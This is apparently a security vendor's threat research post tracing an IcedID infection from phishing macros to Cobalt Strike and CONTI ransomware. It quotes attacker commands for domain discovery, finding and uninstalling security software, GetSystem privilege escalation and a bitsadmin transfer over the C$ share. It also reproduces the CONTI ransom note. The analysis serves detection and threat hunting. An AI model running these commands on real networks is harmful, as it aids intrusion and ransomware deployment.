Cynet’s research and CyOps groups are constantly working to better understand and discover additional angles threat actors might utilize when trying to compromise our customers. This in turn, translates into ongoing activities and analysis of Trojan Bankers malware variants such as the infamous Emotet, Ursnif (A.K.A Gozi), Trickbot, Dridex, and the threat actors’ tactics, techniques, and procedures (TTPs) of those threats.
The data and findings below were derived directly from Cynet client environments and research labs. Cy If you suspect that your devices may be infected with any of the malware described below, please reach out directly to Cynet for help with evaluation an incident response. Cynet’s MDR team, CyOps, is available 24×7 and ready to help you begin threat hunting.
IcedID (A.K.A BokBot); IcedID – ID: S0483 was first seen during September 2017 and classified as a banking trojan malware designed to target financial sectors in the U.S and Europe, allowing threat actors to steal financial information, banking credentials, and payment information using web injection and browser hooking techniques.
From 2017 to 2021, the IcedID threat groups use multiple attack techniques and upgraded the range of malicious capabilities to evade detection and deploy massive attack campaigns. The IcedID threat groups remodeled the MO (modus operandi) into a downloader malware to expand its capabilities beyond a banking trojan to enable the distribution of sophisticated threats such as Cobalt Strike Beacons and ransomware such as MAZE, EGREGOR, Sodinokibi, and CONTI.
With this change, IcedID became part of the Malware-as-a-Service (MaaS) – organized cybercrime.
The TA551 and LUNAR SPIDER threat groups are classified as eCrime groups with a primary motivation of targeting financial organizations. These eCrime groups are associated with various malware, including IcedID, Qakbot, Ursnif, and Valak. The unique pattern of these groups lies within their kill chain method, weaponized office documents (Excel and Word) which are usually contained in a password-protected zipped file and distributed via malspam campaigns through email and download\drop malware (in most of the cases in the form of DLL payloads).
We suspect that the LUNAR SPIDER and WIZARD SPIDER are related as we observed these groups coordinating the distribution of each other’s malware. For example, we observed a LUNAR SPIDER (IcedID) malspam campaign that drops WIZARD SPIDER malware Trickbot. Our recent observations suggest that IcedID infection includes CONTI ransomware which is related to the WIZARD SPIDER threat group.
IcedID (BokBot) overview
Spear phishing attachment distribution via malspam campaigns (zipped, weaponized Microsoft office documents)
User execution via enabling macros
DLL download from C2 server
Loader DLL execution via rundll32\regsvr32; LOLbins (Living Off the Land Binaries)
Fingerprinting and enumeration of the compromised machine
C2 server connection, send initial information
Initial access for sophisticated threats (downloader activity)
IcedID seems to be one of the most trending malwares, taking the place of the infamous Emotet, “the world’s most dangerous malware.” Emotet was taken down at the end of January 2021 by a major law enforcement operation coordinated between multiple authorities including Europol, the FBI, and the UK’s National Crime Agency, along with agencies from Canada, France, Germany, Lithuania, the Netherlands, and Ukraine.
During the last months, Cynet 360 observed a high number of IcedID infections utilizing Cobalt Strike Beacons and finally attempting to impact the domain with CONTI ransomware.
CONTI (MITRE ID: S0575) is a new ransomware observed in the wild and has become a new target for the FBI. On May 20, 2021 the FBI released an article discussing the impact of Conti ransomware on healthcare, law enforcement agencies, and emergency medical services in the US. The CONTI group operates as Ransomware-as-a-Service (RaaS) affiliated with the “Wizard Spider” threat group. CONTI ransomware was first seen at the end of 2020. We have recently observed CONTI targeting the US and Europe. The NCSC (National Cyber Security Centre) has participated in recent CONTI infection investigations.
Cynet360 autonomous breach protection platform detects and prevents the IcedID kill chain.
Cynet CyOps and Research teams have been recently responded to several incidents at organizations where the Cynet360 platform was not deployed where IcedID infection eventually impacted the compromised domain with CONTI ransomware.
The initial access vector in these cases was a malspam campaign delivering malicious email containing a zipped file, followed by a weaponized office document downloading the IcedID malware. The IcedID malware, in turn, launched a Cobalt Strike beacon on the compromised machine that executed discovery actions on the domain while abusing Windows legitimate binaries.
The next steps of the infection included privilege escalation and lateral movement activities. Once the attackers established persistence on the domain, a CONTI ransomware variant was dropped.
The infection chain of IcedID begins through an email vector, by using Spear Phishing emails.
The email is delivered through phishing campaigns containing a Malicious Office Document (weaponized Microsoft Office document) or a password-protected zip file containing the weaponized Microsoft Office document, either MS Word or Excel spreadsheet leading to the execution of multi-stage malicious actions.
Example weaponized Microsoft Office document requesting the user to activate macros:
Magic: PE32+ executable for MS Windows (DLL) (GUI) Mono/.Net assembly
By setting breakpoints, we unpacked the IcedID payload via VirtualAlloc API. An allocated memory section was created with zero bytes and the unpacked payload is written in this section.
The below section is responsible for the unpacking routine:
The memory page of the unpacked IcedID have ERW (Execute, Red, Write) protection.
The Dumped IcedID file contains various HTPP APIs. By using IDA we can observe the use of the HTTP APIs in the code.
The IceID loader retrieves information by performing initial enumeration and fingerprints on the compromised host and sends the information to the Command-and-Control Server. The information includes the OS version and physical address sent in encoded cookie.
Example of cookie names and order:
_gat= OS version
_u= Computer name and the username
__io= User SID
Hunting tip: external socket with the above data could be an indicator of IcedID activity.
The CPU ID check, stored in the _ga:
The OS version check, stored in the _gat:
The user SID check, stored in _io:
Username and Computer name check stored in _U:
Adapter Info check, stored in the _gid:
The IcedID communicating with the C2 server and sending the enumerated data, found in the memory:
After the execution of the first stage loader, the C2 server responds with a fake GZIP payload which is an encrypted payload of the IcedID that was downloaded from a C2 server and executed via rundll32.exe.
After the execution of the license.dat, the post-infection uses dynamic injection behavior related to a Cobalt Strike beacon allowing threat actor groups to gain full remote control over the compromised machine.
The above script is base64 encoded and is also compressed with a GzipStream. By decoding the base64 format and decompressing the GzipStream with Gunzip, we observed the final stage of the PowerShell script.
Back to the IcedID use case, several commands were detected that used by the Cobalt Strike session for discovery.
Discovery – TA007
“The adversary is trying to figure out your environment.
Discovery consists of techniques an adversary may use to gain knowledge about the system and internal network. These techniques help adversaries observe the environment and orient themselves before deciding how to act. They also allow adversaries to explore what they can control and what’s around their entry point to discover how it could benefit their current objective. Native operating system tools are often used toward this post-compromise information-gathering objective.”
nltest /domain_trusts /all_trusts
net view /all /domain
wmic product get name,version
The above discovery command is used for listing the installed application on the host. We have observed threat actors using this command to discover which security applications they are dealing with.
The following command prints the installation package.
wmic product where “Name like ‘%Security Application%'” get Name, IdentifyingNumber
After that, an attempt was made to uninstall the security application via the msiexec command:
We have also observed privilege escalation in cases of Cobalt Strike activity by IcedID actors. The privilege escalation technique was acheived by GetSystem named piped impersonation to gain SYSTEM level privileges.
Hunting tip: The above pattern of the GetSystem command could help to detects a privilege escalation attempt via named pipe. Also, the cmd command executes via services.exe process which could be the second indicator.
“Technique 1 creates a named pipe from Meterpreter. It also creates and runs a service that runs cmd.exe /c echo “some data” >\\.\pipe\. When the spawned cmd.exe connects to Meterpreter’s named pipe, Meterpreter can impersonate that security context. Impersonation of clients is a named pipes feature. The context of the service is SYSTEM, so when you impersonate it, you become SYSTEM.” – Cobalt Strike
After the threat actors enumerated the compromised host, mapped the inter-domain, disabled the security applications and gained SYSTEM privileges, the impact action is ready.
Final stage – CONTI infection
For the lateral movement and distribution of CONTI ransomware, threat actors used C$ share.
bitsadmin /transfer debjob /download /priority normal \\*\C$\Windows\md.dll C:\Windows\ GROUP_x86.dll
The above command is a LOLBin abuse by bitsadmin (used for managing background intelligent transfer) allowing the drop of the CONTI ransomware in the C$ share.
The execution method used to execute the CONTI DLL was regsvr32 command.
The threat actors executed the shadow copy deletion commands manually in most cases through bat files. This action of deleting shadow copies, not via the ransomware functionality itself, is a new development in the last incidents. We suspect that this action was performed manually to impede the detection of the inhibiting recovery technique. The shadow copy deletion commands are not directly related to the ransomware activity in this execution method and could be similar to legitimate activity originated from administrators and 3rd party applications.
CONTI utilizes Windows Restart Manager to ensure the data files are ready for encryption and there is no opened handle to the targeted files by other processes, and if so, the CONTI ransomware terminates these processes. The same technique is used by Sodinokibi (A.K.A REvil) and Ryuk ransomware.
CONTI Ransomware note:
All of your files are currently encrypted by CONTI strain.
As you know (if you don’t – just “google it”), all of the data that has been encrypted by our software cannot be recovered by any means without contacting our team directly.
If you try to use any additional recovery software – the files might be damaged, so if you are willing to try – try it on the data of the lowest value.
To make sure that we REALLY CAN get your data back – we offer you to decrypt 2 random files completely free of charge.
You can contact our team directly for further instructions through our website :
TOR VERSION :
(you should download and install TOR browser first https://torproject.org)
Just in case, if you try to ignore us. We’ve downloaded a pack of your internal data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us as soon as possible.
The CONTI group recently started using a “double extortion” technique, threatening victims that the exfiltrated data will be publicly leaked. This is a new trend amongst threat actors that used to focus ransomware campaigns and attacks solely on data encryption, but have evolved and created an additional leverage and source of income.
YOU SHOULD BE AWARE!
Just in case, if you try to ignore us. We’ve downloaded a pack of your internal data and are ready to publish it on our news website if you do not respond. So it will be better for both sides if you contact us as soon as possible.